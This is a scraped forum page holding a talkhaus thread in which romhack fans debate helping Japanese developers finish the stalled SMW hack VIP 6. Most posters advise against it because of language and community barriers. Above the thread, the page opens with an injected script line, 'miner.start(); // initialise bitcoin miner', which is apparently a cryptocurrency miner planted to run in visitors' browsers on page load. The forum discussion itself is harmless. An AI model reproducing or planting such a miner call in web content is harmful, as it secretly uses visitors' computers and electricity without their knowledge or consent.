<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmw central

VIP 6: Interesting idea

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Slit08

VIP 6: Interesting idea

Postby Slit08 » 4 years ago

Hello there talkhaus,

as you all know VIP 6 is in production for quite a while now. In fact it's been several years since work started on this project. But just as with VIP 5 production of the game just came to a sudden halt since according to the Japanese devs noone knows what to do with the real final level as well as with the two custom bosses since Carol does not participate this time.

Now I had an interesting, yet unconventional thought yesterday.
Please don't roast me, if you don't agree with my suggestion, that's okay, but at the very least it would be worth a thought and even one willing person would be enough.

What if we from the talkhaus would actually make the true final level of VIP 6 and help these guys out? I'm well aware that these Japanese devs work a bit different than we do and we would need one person who could communicate in Japanese and upload the level for us there.
On the other though they are not that strict when it comes to improving and changing a submitted level and are way more open to take a level into the hack even if it might have some flaws.

But think about it: Production is currently on ice since they just don't come up with anyone willing to work on the finale as well as on custom bosses. We from the talkhaus, i.e. raocow in the first place made the VIP series pretty well known in the western SMW ROM hack communities. His VIP LPs are a tradition and from what I heard an actually welcomed one on behalf of the Japanese devs. So why shouldn't we help them out a bit and actively push the hack towards compeltion? :)

In the end all that we would really need is one person here on the talkhaus with both experience in good level designing and the willingness to work on it in order to make that happen, though it would be preferable if we could do something as a community project similiar to Shattered Dreams from JUMP.

Maybe we could even find someone with decent enough coding abilities to make a decent custom boss (*cough* worldpeace *cough*).

But as I said it's just an idea that I had and I'd like to hear what you guys think of it.
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

worldpeace125

Re: VIP 6: Interesting idea

Postby worldpeace125 » 4 years ago

I don't think it's a good idea to participate in it unless we (smw hackers) are really good at Japanese. I notice there's been a conflict between native hackers, but I don't know what's exactly happening there due to language barrier.

As a big fan of the VIP series, I'm looking forward to playing the completed hack, rather than being involved in its development. I guess people who joined JUMP would also think like that.

Drei
First name: Stirling
Pronouns: he/him/his

Postby Drei » 4 years ago

They're a 2ch thing and unless you're a part of 2ch, you probably shouldn't involve yourself just for this. I mean, can you explain most of the jokes and their sources without having had it explained from outside 2ch?

It sucks they're halted on development but that's just a fact of how things can be.

lolyoshi
don't fake the funk on a nasty dunk.

Postby lolyoshi » 4 years ago

From what I asked from a couple of japanese dudes who knew the project, it seems like it's halted because there is no leader to take care of things.
Last edited by lolyoshi on 13 Jun 2016, 22:38, edited 1 time in total.

Slit08

Postby Slit08 » 4 years ago

I understand. I just hope they'll be able to finish this one as well eventually.
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 4 years ago

Or at least release zombie VIP 6.

Return to “the cartridgé”